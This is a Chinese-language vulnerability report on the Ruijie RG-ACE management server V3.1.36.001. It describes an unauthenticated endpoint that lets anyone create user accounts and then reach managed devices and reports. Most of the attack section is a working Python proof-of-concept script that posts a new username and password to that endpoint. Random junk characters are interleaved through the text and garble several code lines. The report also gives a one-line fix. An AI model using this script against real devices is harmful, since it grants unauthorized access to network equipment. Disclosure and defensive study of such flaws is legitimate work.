锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
2 p' y+ r% v: K  t& E" x- L& e
9 P; Z# c- r) N  O' L, `# S/ }7 d
7 f, |; d! m9 A7 d% y5 Q测试的具体版本是
产品名称: 锐捷应用控制引擎
/ f; j& d- h- P9 C+ Y8 a  K版本号: 3.1.36.001 TC
1 N) g4 S9 j: l- Q2 f" N% D0 ]& N编译时间: 201104291730


( I8 R8 l9 `. s9 u漏洞证明：
5 g! E3 C( h+ H. N




9 B* {* r1 u* h  Q4 C" I
执行脚本
#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
+ Q/ C# U' n( t2 Aimport urllib2, urllib,cookielib
7 r1 `* X# ?( V; p* [url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
% e% \6 c) P0 U) g9 L0 Eopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
0 s% s& Q7 Z& O$ X% W("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
2 N+ ?: m( L3 G. ^9 ]( _("email",""),
("mobilePhone",""),
) o) i9 v5 c  {2 \6 q("officePhone",""),
- ?# B9 k' G/ k; m("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
$ H; k. V" ~& }, c* M, v7 Np=urllib2.urlopen(url, urllib.urlencode(post)).read()
' I/ I3 X7 h8 kprint "Done"
3 V; w( G8 U8 _4 }0 q
登录，连接设备

: }1 s( P( x; D( ]: [6 W) D



默认的管理员admin权限更大点

' Y& r% W# O+ {7 g
7 ~  v( i  S$ t$ T


+ V" ]- r9 D2 Z: b  q: L( y修复方案：
加强对接口的权限验证